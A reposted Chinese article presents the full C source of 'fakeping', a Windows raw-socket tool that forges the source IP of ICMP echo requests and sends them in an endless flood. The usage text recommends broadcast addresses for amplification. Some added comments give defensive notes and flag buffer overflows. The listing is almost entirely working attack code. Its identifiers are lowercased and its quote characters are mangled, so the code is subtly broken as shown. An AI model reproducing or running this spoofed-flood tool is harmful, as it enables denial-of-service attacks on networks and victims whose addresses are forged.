
[转载]优秀攻击工具fakeping4W2k源代码

[转载]优秀攻击工具fakeping4W2k源代码

信息来源:南京补天
文章作者:shotgun
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#define seq 0x28376839 // constant that is not referenced anywhere else in this listing
#define status_failed 0xffff // exit code passed to exitprocess() on setup failure
// IP header as the program builds it by hand; the fields follow the IPv4
// header layout without options. The program fills it itself instead of
// letting the stack do so, which is how the source address can be set to an
// arbitrary value (see sourceip).
typedef struct _iphdr  // IP header definition
{
unsigned char h_verlen;  // 4-bit header length and 4-bit IP version packed in one byte
unsigned char tos;  // 8-bit type of service
unsigned short total_len; // 16-bit total length (bytes)
unsigned short ident;  // 16-bit identification
unsigned short frag_and_flags; // 3-bit flags plus 13-bit fragment offset
unsigned char ttl;  // 8-bit time to live
unsigned char proto;  // 8-bit protocol (tcp, udp or other)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceip;  // 32-bit source IP address (taken from the command line, not from the host)
unsigned int destip;  // 32-bit destination IP address
}ip_header;
//
// ICMP header definition
typedef struct _ihdr
{
byte i_type;    // 8-bit type
byte i_code;   // 8-bit code
ushort i_cksum;   // 16-bit checksum
ushort i_id;   // identifier (the process id is commonly used for this)
ushort i_seq;   // message sequence number
ulong timestamp;  // timestamp
}icmp_header;

/*
 * checksum: helper that computes a 16-bit one's-complement checksum.
 *
 * buffer  start of the data, read as consecutive 16-bit words
 * size    number of bytes to cover; a trailing odd byte is added on its own
 *
 * Returns the bitwise complement of the folded 16-bit sum.
 */
ushort checksum(ushort *buffer, int size)
{
    unsigned long sum = 0;
    ushort *word = buffer;
    int remaining;

    /* Add up the data one 16-bit word at a time. */
    for (remaining = size; remaining > 1; remaining -= sizeof(ushort)) {
        sum += *word++;
    }

    /* A leftover byte is added as an 8-bit value. */
    if (remaining != 0) {
        sum += *(uchar *)word;
    }

    /* Fold the carries above bit 15 back into the low 16 bits, twice. */
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;

    return (ushort)(~sum);
}
// fakeping main routine.
//
// As written, the listing reads a claimed source address and a destination
// address from the command line, opens a raw socket with ip_hdrincl set,
// builds one IP + ICMP echo-request datagram whose source field is the
// claimed address, and sends that same buffer repeatedly in an endless loop.
// Replies therefore go to the claimed address rather than to the sender; the
// usage text itself describes this as ping flooding from a fake IP.
//
// Notes for defenders reading this listing:
//  - The datagram uses fixed values (IP ident 1, ttl 128, ICMP type 8 code 0,
//    i_id 2, i_seq 999, timestamp 999, payload of one repeated byte), so the
//    traffic has a constant shape that filtering or detection rules can key on.
//  - The technique depends on the network forwarding packets whose source
//    address does not belong to the sender, and on broadcast addresses being
//    answered. Source-address validation at the network edge (BCP 38), not
//    forwarding directed broadcasts, and ICMP rate limiting address each of
//    these.
//  - Opening a raw socket normally requires elevated privileges on the host,
//    so restricting who holds those privileges limits use of code like this.
int main(int argc, char **argv)
{
int datasize,errorcode,counter,flag;
int timeout=2000, sendseq=0, packetsize=32;
char sendbuf[65535]={0};
wsadata wsadata;
socket sockraw=(socket)null;
struct sockaddr_in destaddr;
ip_header ip_header;
icmp_header icmp_header;
char fakesourceip[20],destip[20];
// read the command-line arguments; with fewer than two, print usage and exit
if (argc<3)
{
 printf("fakeping by shotgun\n");
 printf("\tthis program can do ping-flooding from a fakeip\n");
 printf("\tusing a broadcast ip as the fakeip will enhance the effect\n");
 printf("email:\n");
 printf("\[email]tshotgun@xici.net[/email]\n");
 printf("homepage:\n");
 printf("\thttp://it.xici.net\n");
 printf("\thttp://www.patching.net\n");
 printf("usage:\n\tfakeping.exe fakesourceip destinationip [packetsize]\n");
 printf("example:\n");
 printf("\tfakeping.exe 192.168.15.23 192.168.15.255\n");
 printf("\tfakeping.exe 192.168.15.23 192.168.15.200 6400\n");
 exit(0);
}
// NOTE(review): unbounded strcpy of argv into 20-byte stack buffers; an
// argument of 20 or more characters overruns them.
strcpy(fakesourceip,argv[1]);
strcpy(destip,argv[2]);
// NOTE(review): atoi reports no conversion errors and only the upper bound is
// checked below, so a negative value is not rejected before it is used as a
// length.
if (argc>3) packetsize=atoi(argv[3]);
if (packetsize>60000)
{
 printf("error! packet size too big, must <60k\n");
 exit(0);
}
printf("now fake %s ping %s using packet size=%d bytes\n",
  fakesourceip, destip, packetsize);
printf("\tctrl+c to quit\n");
// initialise the socket library and open the raw socket
if((errorcode=wsastartup(makeword(2,1),&wsadata))!=0)
{
 fprintf(stderr,"wsastartup failed: %d\n",errorcode);
 exitprocess(status_failed);
}
if((sockraw=wsasocket(af_inet,sock_raw,ipproto_raw,null,0,wsa_flag_overlapped))==invalid_socket)
{
 fprintf(stderr,"wsasocket() failed: %d\n",wsagetlasterror());
 exitprocess(status_failed);
}
flag=true;
// set ip_hdrincl so that the program supplies the IP header itself
errorcode=setsockopt(sockraw,ipproto_ip,ip_hdrincl,(char *)&flag,sizeof(int));
// a failure here is only reported; execution continues
if(errorcode==socket_error)
 printf("set ip_hdrincl error!\n");
__try{
 // set the send timeout (timeout is initialised to 2000 above)
 errorcode=setsockopt(sockraw,sol_socket,so_sndtimeo,(char*)&timeout,sizeof(timeout));
 if (errorcode==socket_error)
 {
   fprintf(stderr,"failed to set send timeout: %d\n",wsagetlasterror());
  __leave;
 }
 memset(&destaddr,0,sizeof(destaddr));
 destaddr.sin_family=af_inet;
 destaddr.sin_addr.s_addr=inet_addr(destip);
 // fill in the IP header
 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); // high nibble: IP version, low nibble: header length
 ip_header.total_len=htons(sizeof(ip_header)+sizeof(icmp_header)); // 16-bit total length (bytes)
 ip_header.ident=1;       // 16-bit identification
 ip_header.frag_and_flags=0;      // flags and fragment offset
 ip_header.ttl=128;       // 8-bit time to live
 ip_header.proto=ipproto_icmp;      // 8-bit protocol (tcp, udp or other)
 ip_header.checksum=0;       // 16-bit IP header checksum, zero while the sum is computed
 ip_header.sourceip=inet_addr(fakesourceip);    // 32-bit source address: the user-supplied one, not this host's
 ip_header.destip=inet_addr(destip);     // 32-bit destination address
 // fill in the ICMP header (type 8, code 0) with fixed id, timestamp and sequence values
 icmp_header.i_type = 8;
 icmp_header.i_code = 0;
 icmp_header.i_cksum = 0;
 icmp_header.i_id = 2;
 icmp_header.timestamp = 999;
 icmp_header.i_seq=999;
 // lay out ICMP header + payload at the start of sendbuf to compute the ICMP checksum
 memcpy(sendbuf, &icmp_header, sizeof(icmp_header));
 memset(sendbuf+sizeof(icmp_header), ‘e‘, packetsize);
 icmp_header.i_cksum = checksum((ushort *)sendbuf, sizeof(icmp_header)+packetsize);
 // rebuild sendbuf as IP header, ICMP header, payload, followed by one zero byte
 memcpy(sendbuf,&ip_header,sizeof(ip_header));
 memcpy(sendbuf+sizeof(ip_header), &icmp_header, sizeof(icmp_header));
 memset(sendbuf+sizeof(ip_header)+sizeof(icmp_header), ‘e‘, packetsize);
 memset(sendbuf+sizeof(ip_header)+sizeof(icmp_header)+packetsize, 0, 1);
 // compute the number of bytes to send
 datasize=sizeof(ip_header)+sizeof(icmp_header)+packetsize;
 ip_header.checksum=checksum((ushort *)sendbuf,datasize);
 // copy the IP header, now carrying its checksum, back into the send buffer
 memcpy(sendbuf,&ip_header, sizeof(ip_header));
 // the loop has no exit condition; the program printed "ctrl+c to quit" above
 while(1)
 {
  sleep(100);
  printf(".");
  // after each pause, the same datagram is sent 1024 times
  for(counter=0;counter<1024;counter++)
  {
  // send the ICMP datagram
  errorcode=sendto(sockraw,sendbuf,datasize,0,(struct sockaddr*)&destaddr,sizeof(destaddr));
  if (errorcode==socket_error) printf("\nsend error:%d\n",getlasterror());
  }
 }
}//end of try
 // cleanup: close the raw socket and release the socket library
 __finally {
if (sockraw != invalid_socket) closesocket(sockraw);
wsacleanup();
 }
 return 0;
}
